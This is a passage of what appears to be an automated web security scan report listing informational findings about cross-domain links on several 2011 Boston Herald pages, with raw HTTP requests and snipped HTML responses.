<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.7. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view.bg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /entertainment/movies/reviews/view.bg?articleid=1312518&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Movie Reviews - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Fmovies%2Freviews%2Fview%2F20110128killermoves_statham_fine-tunes_mechanic_mayhem%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/james_verniere.gif?1=1" alt="James Verniere" />
                                       <span class="bold">
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(2) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Jason Statham fine-tunes &lsquo;Mechanic&rsquo; mayhem');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(2) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/entertainment/movies/general/view/20110125action_star_statham_gets_his_fix_in_mechanic_remake/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/147abf_stath_01252011.jpg" alt="Action star Jason Statham gets his fix in &lsquo;Mechanic&rsquo; remake" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

7.8. http://www.bostonherald.com/galleries/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /galleries/index.php

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /galleries/index.php?gallery_id=10 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Boston Herald Sports Cov
...[SNIP]...
<meta name="SUBSECTION" content="Multimedia Center" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234" media="all" />


<style type="text/css">
...[SNIP]...
<a id="galleryHeaderLink" href="#"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a href="?gallery_id=10&p=0" ><img class="galleryThumb galleryThumbSelected" src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01282011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=1" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01272011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=2" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01262011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=3" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01252011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=4" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01242011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=5" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01232011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=6" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01202011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=7" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01212011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=8" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01192011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=9" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan182011_A064.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=10" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01172011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=11" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20110116.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=12" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01152011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=13" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan142011_A076.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=14" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01132011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=15" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01122011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=16" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01112011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=17" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01102011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=18" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01092011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=19" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=20" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01072011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=21" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01062011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=22" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01052011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=23" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01042011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=24" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_02032011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=25" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01022011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=26" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01012011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=27" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12312010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=28" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=29" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=30" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=31" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=32" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=33" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12252010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=34" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=35" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=36" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=37" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=38" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=39" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=40" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20101218.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=41" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=42" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=43" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12152010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=44" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec142010_A060.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=45" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/swports12132010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=46" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12092010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=47" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12122010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=48" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12112010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=49" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12102010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=50" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=51" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec072010_A068.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=52" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=53" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12052010.jpg" alt="Photo" /></a>
...[SNIP]...
<div id="galleryLeftPhotoLeft">
<img id="galleryImage" style="border:solid 1px #000" src="http://multimedia.heraldinteractive.com/images/galleries/Sports_01282011.jpg">

<br />
...[SNIP]...

7.9. http://www.bostonherald.com/homepage.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /homepage.bg

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /homepage.bg?showResults=1#results HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 156016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
